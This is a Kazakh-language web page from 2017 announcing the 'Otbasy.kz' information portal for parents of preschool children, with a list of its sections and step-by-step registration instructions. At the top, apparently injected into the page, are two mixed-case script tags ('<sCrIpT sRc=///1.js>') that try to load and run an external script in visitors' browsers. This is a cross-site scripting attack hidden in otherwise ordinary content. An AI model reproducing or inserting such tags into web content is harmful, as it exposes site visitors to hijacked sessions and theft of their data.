<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.01.2017

«Ақпараттық-талдау орталығы» АҚ қазіргі уақытта мемлекеттік сатып алу шеңберінде «Отбасы.кz» порталының құрылғанын және белсенді жұмыс жасайтыны туралы мәлімдейміз. Ақпараттық портал мектеп жасына дейінгі балалары бар ата-аналар аудиториясына бағдарланған анықтамалық және коммуникациялық Интернет-ресурс ретінде әзірленді. Порталдың құрамында: «Басты бет», «Мамандар», «Медиа-форум», «Жазылу-жіберу», «Жеке кабинет», «Құқықтық база», «Форум», «Балаларға арналады» атты сегіз айдар бар. Осы айдарларда ата-аналар мектепке дейінгі тәрбие мен оқыту саласындағы өзекті ақпаратпен таныса аласыздар, өз балаларыңызды дамыту мен тәрбиелеуде қызығушылық тудырған сұрақтар бойынша тәжірибе, пікір алмаса аласыз. Сондай-ақ, «жеке кабинет» ашып, өз материалдарыңызды орналастыруға болады.

Амалдардың реті қарапайым;

1. «Отбасы.кz» сайтына кіру (назар аударыңыз- Отбасы- кирилицамен жазылады).

2. «Жеке кабинет» айдарын ашу

3. Логин, Құпиясөз, Т.А.Ә., Е-маил, телефон толтыру

4. Мекен-жайы, баланың жасы, тіл

5. Тіркелу

Интернет – ресурсты пайдалану әсерлі көмегін тигізеді деп үміттенеміз.

 

Просмотров: 583


Пікір қосу



Деректерді қолтаңбаға қосу
Текст